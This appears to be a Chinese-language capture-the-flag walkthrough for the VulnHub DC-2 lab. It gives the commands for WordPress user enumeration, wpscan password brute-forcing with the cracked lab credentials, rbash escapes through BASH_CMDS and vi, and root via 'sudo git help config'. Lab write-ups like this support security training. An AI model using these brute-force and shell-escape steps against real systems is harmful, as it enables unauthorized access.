DC2靶场

DC2

下载地址：

https://download.vulnhub.com/dc/DC-2.zip

题目要求：

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

信息收集

1.1 arp-scan -l

1.2 nmap -p- -sV -T5 192.168.126.132

1.3 whatweb 192.168.126.132

修改host

1.4 80端口301状态码永久重定向，修改本地host文件后访问

1.5 再次访问得知是WordPress

1.6 找到第一个flag

cewl获取密码字典

2.1 提示要求登录后台，换用户，可能需要用到cewl

用cewl爬取密码字典

cewl http://dc-2/ -w passwd.txt

2.2 WordPress后台地址

获取用户名

2.3 ?author=1的方法手动遍历用户

1和3回显2个用户

dc-2/?author=1

dc-2/?author=3

2.4 用wpscan检测到3个用户

wpscan --url http://dc-2/ -e u

echo "" > usr.txt

爆破

2.5 wpscan爆破

wpscan --url http://dc-2/ -U usr.txt -P passwd.txt

jerry/adipiscing

tom/parturient

2.6 jerry/adipiscing登录后台，发现flag2

提示WordPress上没有渗透点了，换条路

ssh还没尝试

3.1 ssh tom@192.168.126.132 -p 7744

3.2 ls

cat flag3.txt

发现受到rbash限制

rbash绕过

3.3 rbash绕过

BASH_CMDS[a]=/bin/sh;a#

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

3.4 提到了jerry,su切换到jerry中

su jerry

adipiscing

cd /home/jerry

ls

3.5 cat flag4.txt

flag4提示git

git提权

4.1 git提权

sudo -l

git提权

sudo git help config

!/bin/bash

4.2 提权成功

cd /root

cat final-flag.txt

4.3 得到最后一个flag

补漏

查看可用命令

compgen -c

flag3内容

poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

vi部分提权

vi flag3.txt

:set shell=/bin/sh+回车

:shell+回车

切换到jerry,发现flag4